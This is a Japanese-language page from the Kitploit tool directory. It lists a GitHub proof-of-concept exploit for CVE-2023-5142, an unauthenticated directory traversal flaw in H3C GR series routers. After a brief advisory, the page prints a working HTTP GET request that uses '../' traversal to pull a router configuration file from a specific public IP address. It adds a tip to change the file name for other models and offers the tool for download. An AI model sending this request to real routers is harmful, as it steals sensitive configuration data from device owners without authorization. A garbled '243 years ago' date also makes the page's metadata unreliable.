Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-H3C-Report — CVE-2023-5142のPoCエクスプロイト。H3C GRシリーズルーターの未認証ディレクトリトラバーサル脆弱性を悪用し、機密設定ファイルを抽出する。 | Kitploit
ツール/GitHubGitHub/kuangxiaotu/cve-h3c-report
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集設定ミス
GitHubkuangxiaotu/cve-h3c-report

CVE-H3C-Report

CVE-2023-5142のPoCエクスプロイト。H3C GRシリーズルーターの未認証ディレクトリトラバーサル脆弱性を悪用し、機密設定ファイルを抽出する。

リポジトリを見る
243年前未レビュー
ウェブサイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

H3C GRシリーズルーターのシステム管理に未認証アクセスの脆弱性

製品: GRシリーズルーター

バージョン: 全て

評価: 高リスク

ウェブサイト: http://www.h3c.com/

危険性: 攻撃者はこの脆弱性を悪用し、特別なリクエストパケットを構築して身元確認をバイパスすることで、ルーターから機密情報を取得する可能性があります。

原理: ルーターがディレクトリアクセスおよび関連ファイルの認証を行っていないため。

exp:

注: POC内のファイル名の拡張子を変更する必要があります(例: GR8300.cfg)。

root@kitploit:~
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

image

image

image

ツールをダウンロード